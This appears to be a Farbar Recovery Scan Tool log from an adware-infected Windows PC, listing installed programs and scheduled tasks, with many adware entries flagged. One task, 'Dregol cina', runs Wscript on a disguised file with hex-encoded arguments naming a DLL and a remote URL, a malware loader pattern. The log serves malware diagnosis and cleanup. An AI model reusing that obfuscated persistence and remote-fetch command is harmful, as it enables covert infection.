Alcor Micro USB Card Reader (Version: 4.3.17.00279 - Alcor Micro Corp.) Hidden
AnyProtect (HKLM\...\AnyProtect) (Version: 1.0.0.4 - CMI Limited) <==== ATTENTION
AnySend (HKLM\...\ASPackage) (Version:  - CMI Limited) <==== ATTENTION!
Apple Application Support (32-bit) (HKLM\...\{AFA1153A-F547-409B-B837-3A0D6C5A3FEC}) (Version: 3.1.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{E1DB0812-2D60-43DB-AE09-6C7027D93B28}) (Version: 8.1.1.3 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.0.12.13 - Atheros Communications Inc.)
Atheros Driver Installation Program (HKLM\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Buzzdock (HKLM\...\{cfd32d46-7d3f-483f-bace-7172aec5592d}) (Version:  - Alactro LLC) <==== ATTENTION
CinemaPlus-3.2cV05.07 (HKLM\...\CinemaPlus-3.2cV05.07) (Version: 1.36.01.22 - Cinema PlusV05.07) <==== ATTENTION
CinemaPlus-3.2cV14.07 (HKLM\...\CinemaPlus-3.2cV14.07) (Version: 1.36.01.22 - Cinema PlusV14.07) <==== ATTENTION
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.51.2.64 - Conexant)
DriverToolkit version 8.4.0.0 (HKLM\...\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1) (Version: 8.4.0.0 - Megaify Software)
GamesDesktop 091.005010022 (HKLM\...\gmsd_ra_005010022_is1) (Version:  - GAMESDESKTOP) <==== ATTENTION
globalupdate Helper (Version: 1.3.25.0 - globalupdate Inc.) Hidden <==== ATTENTION
GoHD (HKLM\...\GoHD) (Version: 1.36.01.22 - InstallMoon) <==== ATTENTION
GOM Player (HKLM\...\GOM Player) (Version: 2.2.69.5227 - Gretech Corporation)
Google Chrome (HKLM\...\Google Chrome) (Version: 44.0.2403.107 - Google Inc.)
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{CE1F04C7-79BC-4219-BE6A-BA490224D4B5}) (Version: 12.1.2.27 - Apple Inc.)
Java 8 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Jungle Net (HKLM\...\Jungle Net) (Version: 2.0.5672.17745 - Jungle Net)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Visio Professional 2007 (HKLM\...\VISPRO) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
mystartsearch uninstall (HKLM\...\mystartsearch uninstall) (Version:  - mystartsearch) <==== ATTENTION
OffersWizard Network System Driver (HKLM\...\inethnfd) (Version: 1.0.0.3001 - ) <==== ATTENTION
Opera Stable 30.0.1835.125 (HKLM\...\Opera 30.0.1835.125) (Version: 30.0.1835.125 - Opera Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.1800 - SRS Labs, Inc.)
Quebles Emoticons (HKLM\...\{8E8C2E2D-7F21-2CF5-0ADB-64935121ECF0}) (Version:  - "") <==== ATTENTION
SavePass 1.1 (HKLM\...\SavePass 1.1) (Version: 1.36.01.22 - OB) <==== ATTENTION
See Results Hub (HKLM\...\See Results Hub) (Version: 2.0.5672.17745 - See Results Hub)
Setup (HKLM\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version:  - )
shopperz 2.0.0.461 (HKLM\...\{3c9ce603-44cc-4997-a166-239e6186c6ef}_is1) (Version: 2.0.0.461 - shopperz) <==== ATTENTION
Software Version Updater (HKLM\...\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}) (Version: 1.1.4.2 - ) <==== ATTENTION
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.39.0 - Synaptics Incorporated)
TOSHIBA Face Recognition (HKLM\...\InstallShield_{C730E42C-935A-45BB-A0C5-37E5234D111B}) (Version: 3.1.18.32 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.11 - TOSHIBA Corporation)
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.87.5 - TOSHIBA CORPORATION)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.6.0021.320203 - TOSHIBA Corporation)
TOSHIBA Wireless LAN Indicator (HKLM\...\{5B01BCB7-A5D3-476F-AF11-E515BA206591}) (Version: 1.0.5 - TOSHIBA CORPORATION)
TrimEdit (HKLM\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{426ab601}) (Version:  - Software Publisher) <==== ATTENTION
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Wajam (HKLM\...\WajIEn) (Version: 1.47.5.13 (i1.0) - Wajam) <==== ATTENTION
WinRAR 5.21 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3110752661-1710530649-2414096437-1001_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\localserver32 -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)

==================== Restore Points =========================

25-07-2015 12:23:55 Installed AVG 2015
25-07-2015 12:26:25 Installed AVG 2015
25-07-2015 14:28:21 Removed Visual Studio 2012 x86 Redistributables
25-07-2015 15:36:08 Removed TuneUp Utilities 2014
25-07-2015 15:37:00 Removed TuneUp Utilities 2014 (en-US)
25-07-2015 15:38:50 Removed AVG 2015
25-07-2015 15:41:38 Removed AVG 2015
25-07-2015 18:36:55 Windows Modules Installer
25-07-2015 18:44:07 Windows Modules Installer
25-07-2015 21:49:48 Restore Operation
25-07-2015 22:56:39 Windows Modules Installer

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 14:04 - 2009-06-10 09:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02CB52C8-2505-435B-8996-B502C78230F1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-06-12] (Adobe Systems Incorporated)
Task: {04190EDF-19EF-4947-AC65-B1A4331041C9} - System32\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6 => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.exe <==== ATTENTION
Task: {07808B8C-CA85-4A0F-9049-3070D600C501} - System32\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6 => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.exe <==== ATTENTION
Task: {0A5ACE17-4CEC-4212-9DA4-0C06A1297639} - System32\Tasks\globalUpdateUpdateTaskMachineCore => C:\Program Files\globalUpdate\Update\globalupdate.exe [2015-07-14] (globalUpdate) <==== ATTENTION
Task: {0F010781-7D78-476D-8107-963A2CE94EA5} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4 No Task File <==== ATTENTION
Task: {0F1AAC08-47C6-4C26-9F4F-87C71B5C0092} - System32\Tasks\Opera scheduled Autoupdate 1436238770 => C:\Program Files\Opera\launcher.exe [2015-07-10] (Opera Software)
Task: {16B4CC44-24F7-4D36-B596-876A3170BA43} - System32\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-5_user => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-5.exe <==== ATTENTION
Task: {198534E3-0B42-40B0-923D-42FB297F6504} - \aec13a97-93b2-4738-96e9-978ab384cb13-4 No Task File <==== ATTENTION
Task: {1EC86838-8DBF-4F57-98EC-86267AE374C7} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-10_user => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-10.exe <==== ATTENTION
Task: {1F831148-D10E-4BF2-92C5-62B5222A0A35} - System32\Tasks\{90B60966-ED53-4101-A190-E458620B2F2A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files\VideoLAN\VLC\vlc.exe"
Task: {21E49265-03A3-467C-9035-B479763435E8} - System32\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5_user => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-5.exe <==== ATTENTION
Task: {2B2DCE39-8341-43D1-B829-96DA4BB4DD2E} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.exe <==== ATTENTION
Task: {2B960881-7C18-490A-8C08-DAF82CB5AA6E} - System32\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-6 => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-6.exe <==== ATTENTION
Task: {3305264B-6466-426A-BC4E-0AD7B82C2CD3} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-5_user => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-5.exe <==== ATTENTION
Task: {34F04A27-5DCC-4CE4-916F-67C9B54DD26F} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7 No Task File <==== ATTENTION
Task: {3A2382AF-BF5C-409F-A953-C3907A8342B5} - \TuneInPro No Task File <==== ATTENTION
Task: {3B7AD0F0-5129-4168-98E1-90E4E4C4F6A9} - \aec13a97-93b2-4738-96e9-978ab384cb13-3 No Task File <==== ATTENTION
Task: {3E084B2F-A9AC-4717-9327-4322D2AFA693} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6 No Task File <==== ATTENTION
Task: {3F02B966-A1DF-4571-9226-57573902FBAA} - \aec13a97-93b2-4738-96e9-978ab384cb13-11 No Task File <==== ATTENTION
Task: {4489080A-01B9-428A-809D-D0D27B9BDDEF} - System32\Tasks\Dregol cina => Wscript.exe "C:\ProgramData\{9A2272E1-CAA0-A367-7B26-D3E5ABA4006B}\2.0.1.9\date.txt" "433a2f50726f6772616d446174612f7b39413232373245312d434141302d413336372d374232362d4433453541424134303036427d2f322e302e312e392f63696e612e646c6c" "687474703a2f2f73616f2e7265716472652e636f6d2f" "--IsErIk" "//E:jscript"
Task: {479AA25B-837B-4640-B1F3-34339D871535} - \7ac5c440-fd07-4e61-a049-8edfc7759672-3 No Task File <==== ATTENTION
Task: {4BCF5A6D-60B1-4F30-81E6-A871B337079D} - System32\Tasks\aec13a97-93b2-4738-96e9-978ab384cb13-10_user => C:\Program Files\GoHD\aec13a97-93b2-4738-96e9-978ab384cb13-10.exe <==== ATTENTION
Task: {4DA17D03-2325-4BED-825B-551B1439EC96} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5 No Task File <==== ATTENTION
Task: {50D79D96-6A26-4068-871E-BD15E72ECF6A} - \APSnotifierPP1 No Task File <==== ATTENTION
Task: {5529B242-EAED-41DA-93AF-4F351C55278E} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6 => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.exe <==== ATTENTION
Task: {577BBA3B-CA0F-4447-95D0-50E9A681C0BB} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3 No Task File <==== ATTENTION
Task: {5F4B1C19-11E6-41B2-80E7-5E53AF502178} - System32\Tasks\DriverToolkit Autorun => C:\Program Files\DriverToolkit\DriverToolkit.exe [2014-09-20] (Megaify Software Co., Ltd.)
Task: {62AC7910-5FE8-41AB-B722-2025DA31E752} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-7 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-7.exe <==== ATTENTION
Task: {66062F97-C34B-4AA2-BB86-572AFC98AD9E} - System32\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-6 => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-6.exe <==== ATTENTION
Task: {6759CA88-95A4-4856-A6D6-4DDCBBECD125} - \7ac5c440-fd07-4e61-a049-8edfc7759672-1-7 No Task File <==== ATTENTION
Task: {696F20A9-4DE7-4DD6-9ECB-E950A9336C74} - \7ac5c440-fd07-4e61-a049-8edfc7759672-5 No Task File <==== ATTENTION
Task: {6DFEFC15-D248-4BAD-9E19-44B007DD3204} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7 No Task File <==== ATTENTION
Task: {6E6C02DF-0C7E-4423-BA24-631F79DFD847} - \98d446af-8794-4b83-b37f-028ad13d59d8-1-7 No Task File <==== ATTENTION
Task: {6F9AD10A-406C-4AF3-A21D-E4E9EF10780D} - System32\Tasks\{3EC43F45-D128-4FDC-A5BF-284B5DD6C4F2} => pcalua.exe -a C:\Users\Cukwenk\AppData\Local\Temp\jre-8u45-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1
Task: {725BF4AC-0FF8-495C-8874-90D03FCBB83C} - \98d446af-8794-4b83-b37f-028ad13d59d8-4 No Task File <==== ATTENTION
Task: {74849035-AA71-4055-AA78-E183793F541E} - System32\Tasks\APSnotifierPP3 => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: {76142B85-AE4D-43A4-A2D5-5CCF74F9080A} - System32\Tasks\{F3014417-10B1-42E7-9724-EFDD6C63BC30} => pcalua.exe -a C:\Users\Cukwenk\AppData\Roaming\mystartsearch\UninstallManager.exe -c  -ptid=cmi
Task: {7915197C-4F92-45BB-8C9E-ECCBDE30A520} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6 => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.exe <==== ATTENTION
Task: {7DE4D457-DB5F-44C3-A9B2-32D83D4CD852} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4 No Task File <==== ATTENTION
Task: {7E41AA52-14D7-404E-B46B-076D0BB44F7F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-22] (Adobe Systems Incorporated)
Task: {81DB658C-F128-4C81-8688-AF98EAE1AD07} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {85F14A70-4033-4A8F-A4BF-2B0FFEA4FB08} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-07-25] (Google Inc.)
Task: {8AFE2994-A92F-4674-8B6D-6CF1708D3B6F} - \7ac5c440-fd07-4e61-a049-8edfc7759672-7 No Task File <==== ATTENTION
Task: {904EE556-9F19-4E53-89F4-0E5AF9F0207C} - System32\Tasks\ASP => C:\Program Files\RCP\systweakasp.exe
Task: {98C8C41D-978A-49CA-BD29-AA30C1DFAE6D} - System32\Tasks\Crossbrowse => C:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe <==== ATTENTION
Task: {992BF276-0A1A-4149-8925-367F8A787A52} - System32\Tasks\{14700DA3-28ED-43C2-A0CD-C9E5AD411CE6} => C:\Program Files\VideoLAN\VLC\vlc.exe [2015-04-13] (VideoLAN)
Task: {997C5ADB-6679-4173-88F9-2E7E172FC02E} - \AmiUpdXp No Task File <==== ATTENTION
Task: {9BB0DC6E-2390-4FA5-BB74-9B346EBA01BF} - System32\Tasks\globalUpdateUpdateTaskMachineUA => C:\Program Files\globalUpdate\Update\globalupdate.exe [2015-07-14] (globalUpdate) <==== ATTENTION
Task: {9DC0E81C-2DF0-4D7C-9573-28CD1900B579} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3 No Task File <==== ATTENTION
Task: {9F47E059-6EA7-441E-A2C2-B55E84B2AD7A} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-11 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-11.exe <==== ATTENTION
Task: {A090BC50-B02F-4171-9111-DED913CE5C86} - \98d446af-8794-4b83-b37f-028ad13d59d8-5 No Task File <==== ATTENTION
Task: {A1DA6487-03EF-4A2B-89E3-6EAE7BC198E4} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11 No Task File <==== ATTENTION
Task: {A2497EB2-5072-4ED2-B4B9-F0433342A109} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7 No Task File <==== ATTENTION
Task: {A856D036-CC75-4D1C-B004-B3B86E6B54CA} - \aec13a97-93b2-4738-96e9-978ab384cb13-1-6 No Task File <==== ATTENTION
Task: {AAEAE9C6-2D57-4064-8CD9-D201AC086727} - \7ac5c440-fd07-4e61-a049-8edfc7759672-10_user No Task File <==== ATTENTION
Task: {ADCA9788-234C-48A5-AE79-5A8EED9325D2} - System32\Tasks\Dlvfecrd => C:\Program Files\shopperz\Mlsaizwav.bat [2015-07-01] () <==== ATTENTION
Task: {B7B20E6D-8C97-4236-A2D7-C7A2F771B734} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5 No Task File <==== ATTENTION
Task: {C743BC85-5A33-418A-B7FB-BBE158A61DC1} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-6 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-6.exe <==== ATTENTION
Task: {CFBAA0D9-448D-45EA-B0C3-75764B2F1ECC} - \aec13a97-93b2-4738-96e9-978ab384cb13-5 No Task File <==== ATTENTION
Task: {D10CE50F-1D9B-4AC3-A34B-66889F5CAC96} - \35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7 No Task File <==== ATTENTION
Task: {D57C3679-E7BB-4E35-B28E-D92041527F40} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {D714A91F-0E89-43B7-BECD-8393186B2726} - System32\Tasks\Run_Dregol => C:\Users\Cukwenk\AppData\Local\{8550B~1\UNINST~1.EXE
Task: {D8B87F7A-6902-49A5-AFF8-BE69D84268EE} - System32\Tasks\APSnotifierPP2 => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: {DD63C69A-BF5F-4BC4-9EF1-EA95B16F81EE} - System32\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10.exe <==== ATTENTION
Task: {EE3580FC-FB80-4AAA-A165-EEFDDC697BEF} - System32\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10.exe <==== ATTENTION
Task: {EF070D96-8DDB-4121-A948-C88F29DE5F1C} - System32\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.exe <==== ATTENTION
Task: {F38EA665-4F72-4480-9ABF-478F99C1F8F9} - \aec13a97-93b2-4738-96e9-978ab384cb13-7 No Task File <==== ATTENTION
Task: {F47A80F5-A62E-4A16-9B2D-3F097035C560} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-3 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-3.exe <==== ATTENTION
Task: {F52B0961-AB29-480E-97E9-55A61DA04F6B} - \aec13a97-93b2-4738-96e9-978ab384cb13-1-7 No Task File <==== ATTENTION
Task: {F8209B84-EE29-40A9-BB6F-46F2984469A7} - System32\Tasks\Advanced System~Protector => C:\Program Files\ASP\AspManager.exe [2015-06-30] ()
Task: {FAD173F5-EB96-4143-A3C5-948A1557E241} - System32\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-6 => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.exe <==== ATTENTION
Task: {FBBB7A6E-0BC9-425A-A4D7-CD83BE342E0A} - System32\Tasks\Advanced System~Protector_startup => C:\Program Files\ASP\AdvancedSystemProtector.exe [2015-06-30] () <==== ATTENTION
Task: {FCB3347D-A432-4038-A391-D28F97A23FA8} - \6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11 No Task File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7.job => C:\Program Files\SavePass 1.1\35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7.job => C:\Program Files\CinemaPlus-3.2cV14.07\6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-7.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-10_user.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-3.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5_user.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-6.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-7.job => C:\Program Files\CinemaPlus-3.2cV05.07\7ac5c440-fd07-4e61-a049-8edfc7759672-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-1-7.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-10_user.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-11.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-3.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\98d446af-8794-4b83-b37f-028ad13d59d8-4.job => C:\Program Files\GoHD\98d446af-8794-4b83-b37f-028ad13d59d8-4.exe <==== ATTENTION
